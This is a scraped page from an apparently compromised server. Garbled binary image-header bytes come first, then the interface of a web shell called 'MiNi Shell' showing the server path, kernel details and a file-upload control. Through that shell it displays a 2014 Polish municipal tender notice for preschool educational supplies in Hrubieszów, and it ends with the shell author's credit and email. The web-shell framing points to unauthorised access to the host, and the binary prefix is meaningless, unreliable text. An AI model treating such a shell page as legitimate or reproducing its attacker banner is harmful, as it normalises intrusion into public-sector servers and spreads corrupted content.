JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140307/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140307/49289-N-2014.html

<p class="kh_header"><b>Hrubieszów: Dostawa wyposażenia 5 punktów przedszkolnych i materiałów dydaktycznych w ramach realizowanego projektu Kubusiowa Akademia z Programu  Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 49289 - 2014; data zamieszczenia: 07.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Hrubieszów , ul. B. Prusa 8, 22-500 Hrubieszów, woj. lubelskie, tel. 0 84 696 26 81, faks 0 84 696 27 94.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://ughrubieszow.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia 5 punktów przedszkolnych i materiałów dydaktycznych w ramach realizowanego projektu Kubusiowa Akademia z Programu  Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów dydaktycznych dla 5 punktów przedszkolnych, utworzonych w budynkach szkół tj. Szpikołosy, Czerniczyn, Husynne, Cichobórz, Ślipcze w ramach realizacji projektu Kubusiowa Akademia- utrwalanie i rozwój efektów Poakcesyjnego Programu Wsparcia Obszarów Wiejskich w Gminie Hrubieszów w ramach Priorytetu IX, Działanie 9.1., Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechniania edukacji przedszkolnej Programu Operacyjnego Kapitał Ludzki.
Zakres zamówienia obejmuje dostawę:

1.	Materiały dydaktyczne dla 5 punktów przedszkolnych: 

1)	zestaw materiałów papierniczych - 5 zestawów.
1 zestaw zawiera: 
- komplet papierów kolorowych - komplet papierów o zróżnicowanej gramaturze, zdobiony, falisty, folia holograficzna, min 100 arkuszy o formacie A4 i min 100 arkuszy o formacie A3 - 1 kpl
- zestaw filcowy - min 9 szt filcu o wym. min. 20 x 30 cm, kolorowe nitki, motki wełny 5 g w min 5 kolorach, igła do filcu, koraliki w różnych kolorach i kształtach min 400 szt, cekiny i kwiatki min 100 szt, - 2 zestawy 
- zestaw do quillingu -  zawiera nawijak, tabliczkę, korkową podkładkę, min 6 szpilek do przytwierdzania, min 250 pasków papierowych kolorowych o wym. min 0,4 x 34,5 - 2 zestawy
- papier rysunkowy biały A4 - min 250 szt/op - 4 opakowania 
- papier rysunkowy kolorowy A3 - min 10 kolorów, 150 szt/op - 1 opakowanie
- papier samoprzylepny - wym. min 25 x 35 cm, format A4, min 40 szt/op - 2 opakowania
- papier wycinankowy - format A4, 10 kolorów, min 130 szt/op - 2 opakowania
- papier fluorescencyjny samoprzylepny - 10 szt/op, wym. min 33 x 24 cm - 4 opakowania
- bibuła mix kolorów - 10 kolorów/op, wym. 200 x 50 cm - 4 opakowania
- krepina metalizowana - 5 kolorów/op, wym. 200 x 50 cm - 1 opakowanie
- papier witrażowy - 10 szt/op, wym. min 18 x 29 cm - 2 opakowania
- papier z drobinkami brokatu - 10 kolorów/op, wym. min 20 x 30 cm - 1 opakowanie
- papier bibułkowy wzorzysty - imitujący skóry zwierząt, 10 szt/op, wym. min 30x10 cm - 1 opakowanie
- papier dekoracyjny - 2 wzorki, po 10 szt/op, wym min. 20 x 30 cm - 2 op
- papier harmonijka - 3 szt/op, wym min. 20 x 30 cm - 1 opakowanie
- pojemniki na pędzle i wodę - 4 szt
- pędzle płaskie - 24 szt/op - 1 opakowanie
- pędzle okrągłe -  8 szt/op - 2 opakowania
2) zestaw materiałów do manualnych ćwiczeń plastycznych - 5 zestawów. 
1 zestaw zawiera: 
- węgiel naturalny - min 5 szt/op - 2 opakowania
- kredki grube -  min 12 sz/op - 8 opakowań
- kredki świecowe -min 100 sz/op - 2 opakowania
- kreda - min 40 szt/op - 1 opakowanie
- pastele olejne - min 20 szt/op - 1 opakowanie
- temperówki - 10 szt
- gumki do ścierania -10 szt  
- modelina  - min 6 szt/op - 2 opakowania
- ciasto-plasto -  min. 5 kubeczków po 30g/op - 2 opakowania
- plastelina - min 12 kolorów/op - 1 opakowanie
- nożyczki plastikowe - min 5 sz/op - 5 opakowań
- nożyczki biurowe - min 3szt/op - 3 opakowania
- komplet tkanin do szycia strojów - min 15 szt/op około 60 x 70 cm - 1 opakowanie
- pistolet do klejenia -1 szt
- wkłady kleju do pistoletu - min 1kg/op - 1 opakowanie
-  krosno duże - z drewnianą ramą, wym. min 40 x 30 cm - 1 szt
- 3 zestawy kuferków z materiałami plastycznymi (zimowy, jesienny, świąteczny) - zawierający :folię metalizowaną, tekturę falistą, brystol kolorowy, papier transparentny, druciki, oczka, gwiazdki, akcesoria do wykonania dekoracji świątecznych) - 3 zestawy
- tablica korkowa do ekspozycji prac plastycznych - wym. min 90 x 150 cm - 1 sztuka

2. Zestaw materiałów edukacyjnych do prowadzenia zajęć ogólnorozwojowych dla 5 punktów przedszkolnych:

1) zestaw zabawek manipulacyjnych do ćwiczenia małej motoryki - 5 zestawów
1	zestaw zawiera:
- zabawki labirynty o różnych kształtach - 4 szt/zestaw - 1 zestaw
- piramidki o różnych kształtach - 2 szt/zestaw - 1 zestaw
- klocki duże, drewniane do budowania na kondygnacjach, min 27 klocków w zestawie - 1 zestaw
- przewlekanki/nawlekanki o różnych kształtach - 3 szt/zestaw - 1 zestaw
- drewniane układanki o różnych kształtach - 5 szt/zestaw - 1 zestaw
- gwoździki do mozaiki - gwoździki kolorowe, min 1500 szt/zestaw, wym. min 0,9 x 2,5 cm, - 1 zestaw
- kratki do mozaiki plastikowe, min 5 szt/zestaw, wym. 27 x 19,5 cm - 2 zestawy
- węże magnetyczne - wym. min 13 x 13 x 1 cm - 1 szt
2)	zestaw klocków konstrukcyjnych do manipulowania - 5 zestawów 
1 zestaw zwiera:
- duże klocki - do zabaw konstrukcyjnych, min 100 szt/op, wym. min 5- 10 cm - 1 zestaw
- klocki modułowe - do zabaw przestrzennych, min 120 szt/op, wym. min. 4-8cm - 1 zestaw
3)	zestaw do pisania, czytania i grafomotoryki - 5 zestawów
1 zestaw zawiera: 
- zestaw do ćwiczeń graficznych - drewniany, wym. min. 35 x 14 x 5 cm - 1 zestaw 
- memo - alfabet - gra na pamięć i koncentrację - 1 szt 
- alfabet zgadywanka - zbiór zagadek w formie obrazków, min 20 zagadek - 1 zestaw
- układanki sylabowe - pomoc do nauki sylabowania, z obrazkami, min 40 obrazków - 1 zestaw
- alfabet drewniany ruchomy - drewniana zabawka na stojaku do nauki liter - 1 szt
- alfabet ruchomy - karty do nauki alfabetu, min 70 kart/op - 1 zestaw
- literkowe zabawy - zestaw kart z klockami, min 15 kart/op - 1 zestaw
- zestawy sylab - klocki z sylabami, min 24 klocki/op - 1 zestaw
- rebusy obrazkowe - min 20 rebusów/op - 1 zestaw
- sylaby na tkaninach - zestaw plansz do nauki sylab z tkanin, wym min 150 x 150cm - 1 zestaw
4)	zestaw do nauki liczenia w zakresie 1-10 - 5 zestawów
1 zestaw zawiera:
- układanki matematyczne - zestaw zawiera min 90 elementów - 1 szt
- układanka matematyczna drewniana do nauki figur geometrycznych i liczenia 1-6 - 1 szt
- puzzle matematyczne do nauki 1-10 - 1 szt 
5)	zestaw książek - 5 zestawów
1 zestaw zawiera:
- książki wspomagające koncentrację u dzieci - 2 szt
- książka do nauki matematyki - zbiór tekstowych zadań - 1 szt
- książka do nauki liczenia - 1 szt
- książki z wzorami liter i cyfr pisanych do pisania po śladzie - 5 szt

3. wyposażenie kącików zainteresowań chłopcy/dziewczynki

1)	zestaw zabawek konstrukcyjnych i drewnianych i plastikowych - 5 zestawów
1	zestaw zawiera:
- domek z drewnianych klocków - wym. klocków min. 11 x 11 cm, min 15 klocków - 1 zestaw
- autobetoniarka - układanka drewniana - z kołami ruchomymi, która po ułożenia tworzy autobetoniarkę- 1 szt
- helikopter z klocków - zestaw drewnianych klocków, wym. min. 12 cm, min. 11 klocków - 1 zestaw
- zestaw klocków drewnianych - różne fortyfikacje - 4 kpl/zestawie - 1 zestaw
- zestaw LEGO - min 300 klocków - 1 zestaw
- podstawa do klocków LEGO - 1 szt
2)	zestaw do zabawy w dom - 5 zestawów 
1	zestaw zawiera:
- zestaw do prasowania - deska do prasowania, żelazko, spryskiwacz - 1 zestaw
- kuchenka - z 3 palnikami i otwieranym piekarnikiem , wym. min 100 x 30 x 50 cm - 1 szt
- zastawa do herbaty (filiżanki, spodki, cukiernica, łyżeczki, dzbanek) - min dla 4 osób - 1 zestaw
3)	zestaw lalek i akcesoriów - 5 zestawów 
1 zestaw zawiera : 
- lalki z akcesoriami duże - 3 szt różnych lalek
-  wózek dla lalek - 1 szt
4)	zestaw pojazdów - 5 zestawów 
1	zestaw zawiera:
- kolejka drewniana - tor i akcesoria, min 60 elementów - 1 zestaw
-  samochody - przemieszczające się po torze, min 4 samochody - 1 zestaw
- auto policyjne - 1 szt
-  auto medyczne - 1 szt
- traktor ze zwierzętami - 1  zestaw
- traktor duży z przyczepą - masywny, wym. min 100 cm - 1 szt
- wózek w kształcie żyrafy - wym. min 40 x 30 x 50 cm - 1 szt

4.	pomoce dydaktyczne dla logopedy do indywidualnej terapii logopedycznej - 5 zestawów
1	zestaw zawiera:
- kwestionariusz do badania artykulacji  - zawiera karty pracy z dzieckiem - 1 zestaw
- Zestaw kart do poznawania dźwięków - 1 szt, 
- Zestaw różnicowania głosek - 1 szt
- karty do ćwiczeń głosek - 1 zestaw
- gra do zabawy z głoskami - 1 szt
- Zestaw domin logopedycznych - do ćwiczenia głosek - 5 domin/zestaw - 1 zestaw 
- Zestaw edukacyjny Alfabet - zawiera kartoniki z literami i znakami interpunkcyjnymi, min 300 kartoników - 1 zestaw
- Słuch fonemowy i fonetyczny- książka- 1 szt
- 3 częściowy zestaw Logo- obrazków  (sygmatyzm, rotacyzm, mowa bezdźwięczna) - 1 zestaw
- Loteryjka z podmuchem - 1 szt
- Telefon- szept - 1 szt
- Turbinka -1 szt
- Wibrator z łopatkami - 1 szt
- pudełeczka umożliwiające nagrywanie 10 sekundowych sekwencji - 1 szt

5.	pomoce dydaktyczne do j. angielskiego - 5 zestawów

1	zestaw zawiera:
- zestaw płyt CD z piosenkami do nauki dla dzieci - min 20 płyt CD/zestaw - 1 zestaw
- gry językowe - min 6 różnych gier językowych/zestaw -  1 zestaw
- zestaw puzzli o różnych kształtach - min 12 kpl/zestaw różnych puzzli - 1 zestaw
- zestaw pomocy do nauki nazw miesięcy - mata wym. min 90 x 220 cm, - 1 szt, puzzle - 1 szt - 1 zestaw
- zestaw pomocy do nauki nazw dni tygodnia - mata min wym. 100 x 160 cm - 1 szt, plansza - 1 szt - 1 zestaw 
- zestaw plansz tematycznych wspomagających zapamiętywanie cyfr z języka angielskiego - min 4 szt/zestaw - 1 zestaw
- zestaw plansz tematycznych wspomagające zapamiętywanie kolorów z języka angielskiego - min 4 szt/zestaw - 1 zestaw
- zestaw plansz tematycznych wspomagające zapamiętywanie kształtów z języka angielskiego - min 4 szt/zestaw - 1 zestaw
- zestaw kart i gier ułatwiających naukę angielskich słówek - min. 5 zestawów gier -   1 zestaw.
Zabawki będące przedmiotem zamówienia muszą spełniać wymagania
bezpieczeństwa i higieny oraz posiadać oznakowanie CE - zgodnie z rozporządzeniem
Ministra Edukacji Narodowej w sprawie rodzajów innych form wychowania przedszkolnego,
warunków tworzenia i organizowania tych form oraz sposobu ich działania.
Wszystkie elementy zamówienia powinny być oznakowane podstawowymi logotypami: Logo
PO KL i flagę Unii Europejskiej z dwoma podpisami oraz informacją o realizowaniu projektu
współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu
Społecznego - według Wytycznych dotyczących oznaczania projektów w ramach Programu
Operacyjnego Kapitał Ludzki z dnia 4 lutego 2009 r.
Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
Realizowany projekt współfinansowany jest ze środków Unii Europejskiej z Europejskiego
Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
Określenie przedmiotu zamówienia wg Wspólnego Słownika Zamówień CPV:
39162100-6 Pomoce dydaktyczne..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności i czynności; 
	Ocena spełniania ww. warunku udziału w postępowaniu dokonana będzie na podstawie przedłożonego do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych warunków zamówienia - pkt 1 oświadczenia) wg zasady spełnia / nie spełnia;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia; 
 		Ocena spełniania ww. warunku udziału w postępowaniu dokonana będzie na podstawie przedłożonych do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych warunków zamówienia - pkt 2 oświadczenia) wg zasady spełnia / nie spełnia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem  technicznym; 
  Ocena spełniania ww. warunku udziału w postępowaniu dokonana będzie na podstawie przedłożonych do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych warunków zamówienia - pkt 3 oświadczenia) wg zasady spełnia / nie spełnia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania osobami zdolnymi do wykonania zamówienia; 
  Ocena spełniania ww. warunku udziału w postępowaniu dokonana będzie na podstawie przedłożonych do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych warunków zamówienia - pkt 3 oświadczenia) wg zasady spełnia / nie spełnia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej i finansowej;
	Ocena spełniania ww. warunku udziału w postępowaniu dokonana będzie na podstawie przedłożonego do oferty oświadczenia o spełnieniu warunków udziału w postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych warunków zamówienia - pkt 4 oświadczenia) wg zasady spełnia / nie spełnia;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  dopuszcza zmianę postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy wyłącznie w sytuacji gdy wprowadzenie tych zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawierania umowy lub zmiany te są nieistotne albo korzystne dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ughrubieszow.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Hrubieszów
ul. B. Prusa 8
22-500 Hrubieszów
pokój nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2014 godzina 14:00, miejsce: Urząd Gminy Hrubieszów
ul. B. Prusa 8
22-500 Hrubieszów
pokój nr 15 (sekkretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizowany projekt współfinansowany jest ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com